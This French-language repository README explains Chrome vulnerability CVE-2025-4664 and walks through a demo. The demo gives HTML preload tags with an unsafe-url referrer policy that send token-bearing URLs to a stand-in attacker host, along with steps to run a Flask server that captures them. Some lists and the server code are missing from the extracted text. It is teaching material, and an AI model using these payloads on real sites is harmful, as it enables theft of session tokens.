
Démonstration pédagogique de la CVE-2025-4664, une vulnérabilité du chargeur Chrome permettant une fuite de données inter-origines via la manipulation de la politique de référent (referrer-policy). Inclut une page HTML victime et un serveur Flask attaquant pour une simulation pratique d'exploitation.
La vulnérabilité CVE-2025-4664 est un défaut de sécurité de haute gravité identifié dans le composant Loader de Google Chrome, présent dans les versions antérieures à la 136.0.7103.113. Ce problème permet à un attaquant distant de filtrer des données d'origine croisée via une page HTML spécialement conçue, ce qui peut compromettre des informations sensibles telles que des jetons de session ou des identifiants d'authentification.
Le défaut réside dans une implémentation inappropriée des politiques de sécurité dans le composant Loader de Chrome. Plus précisément, Chrome interprète la directive referrer-policy dans l'en-tête HTTP Link pour les requêtes de sous-ressources (comme les images ou les scripts), même lorsque d'autres navigateurs ne le font pas. Un attaquant peut en tirer parti en configurant une politique moins restrictive, comme unsafe-url, ce qui amène Chrome à divulguer des URL complètes, y compris des paramètres sensibles, à des domaines contrôlés par l'attaquant.
Cette vulnérabilité a été activement exploitée dans des environnements réels, ce qui a conduit l'Agence de cybersécurité et de sécurité des infrastructures des États-Unis (CISA) à l'inclure dans son Catalogue des vulnérabilités connues et exploitées (KEV). La CISA a fixé au 5 juin 2025 la date limite pour que les agences fédérales appliquent les correctifs correspondants.
Google a publié des mises à jour pour corriger cette vulnérabilité dans les versions suivantes :
Il est fortement recommandé à tous les utilisateurs de mettre à jour leur navigateur Chrome vers la version la plus récente disponible. Pour vérifier et appliquer la mise à jour :
De plus, les utilisateurs de navigateurs basés sur Chromium, comme Microsoft Edge, Brave, Opera et Vivaldi, doivent être attentifs aux mises à jour correspondantes, car ils pourraient être affectés par cette vulnérabilité.
Maintenir le navigateur à jour est essentiel pour se protéger contre les menaces de sécurité actives et sauvegarder les informations personnelles.
La vulnérabilité CVE-2025-4664 est exploitée en manipulant la manière dont Google Chrome gère la politique de referrer (referrer-policy) lors du chargement de sous-ressources (comme les images, les scripts, etc.) depuis des liens HTML.
🌐 Création d'un site malveillant :
L'attaquant crée un site web qui inclut un lien HTML comme celui-ci dans son en-tête HTTP :
<link rel="preload" as="image" href="https://victima.com/imagen.jpg" referrerpolicy="unsafe-url">
🔧 Manipulation de referrer-policy : Dans la plupart des navigateurs, cet attribut referrerpolicy dans la balise ne s'applique pas à la ressource chargée. Cependant, Chrome l'applique, ce qui est au cœur du problème.
📤 Fuite du Referer : Lorsque le navigateur de la victime (Chrome) charge la ressource depuis victima.com, il envoie l'URL complète du site d'origine comme en-tête Referer, ce qui peut inclure :
<link rel="preload" as="image" href="https://atacante.com/captura.jpg" referrerpolicy="unsafe-url">
1- L'attaquant envoie à la victime un lien vers :
https://atacante.com/pagina-maliciosa.html
<link rel="preload" as="image" href="https://victima.com/perfil?token=ABC123" referrerpolicy="unsafe-url">
Referer: https://victima.com/perfil?token=ABC123
au domaine de l'attaquant, exposant le jeton.

index.html — Fichier victimeCe fichier simule la victime de l'attaque ; c'est une démo HTML simplifiée pour montrer comment la vulnérabilité CVE-2025-4664 peut être exploitée à l'aide d'une balise malveillante :
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<title>Demo CVE-2025-4664</title>
<!-- Este recurso apunta a un sitio de la víctima con información sensible en la URL -->
<link rel="preload" as="image"
href="https://victima.com/perfil?token=ABC123"
referrerpolicy="unsafe-url">
</head>
<body>
<h1>Demostración de la vulnerabilidad CVE-2025-4664</h1>
<p>Si estás usando una versión vulnerable de Chrome, el navegador enviará el <strong>Referer completo</strong> a la URL de arriba.</p>
</body>
</html>
servidor_atacante.py — Fichier attaquantAvec ce script, il est possible d'automatiser l'attaque pour capturer les Referer à l'aide d'un petit serveur en Python. Voici un exemple utilisant Flask pour simuler le serveur de l'attaquant qui reçoit les données :
index.html.pip install flask
python servidor_atacante.py
<link rel="preload" as="image"
href="http://<tu_IP>:8080/captura.jpg"
referrerpolicy="unsafe-url">
Remplacez <tu_IP> par l'IP publique ou locale du serveur qui exécute le script.
Ouvrez un terminal (PowerShell ou CMD).
Naviguez vers le dossier du fichier :
cd "C:\Users\Sebas\Desktop\servidor_atacante"
python servidor_atacante.py
* Running on http://127.0.0.1:8080
* Running on http://192.168.1.35:8080
Dans ce même dossier (C:\Users\Sebas\Desktop\servidor_atacante), créez un fichier nommé index.html avec ce contenu :
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<title>Demo CVE-2025-4664</title>
<!-- Simula el ataque -->
<link rel="preload" as="image"
href="http://192.168.1.35:8080/captura.jpg"
referrerpolicy="unsafe-url">
</head>
<body>
<h1>Simulación CVE-2025-4664</h1>
<p>Este HTML intenta filtrar la URL completa (incluyendo el token) al atacante.</p>
</body>
</html>
✅ Important : Assurez-vous que l'IP (192.168.1.35) corresponde à celle que Flask affiche comme IP locale. Si elle est différente, modifiez-la dans le HTML.
Ouvrez Chrome.
Dans la barre d'adresse, saisissez :
file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123
Appuyez sur Entrée.
📥 Voir le résultat sur le serveur Dans la console de Flask, vous devriez voir quelque chose comme :
[+] Referer recibido: file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123
[Carpeta destino] : Modifiez ce paramètre selon l'endroit où vous avez enregistré le fichier.
🎯 Cela signifie que le navigateur a envoyé le Referer complet à l'attaquant !
Explication réalisée par Sebastian Peinador à des fins pédagogiques et de recherche en cybersécurité offensive.
Ce matériel est distribué sous la licence MIT.
Si cela vous est utile, n'oubliez pas de mettre ⭐ au dépôt ou de le partager !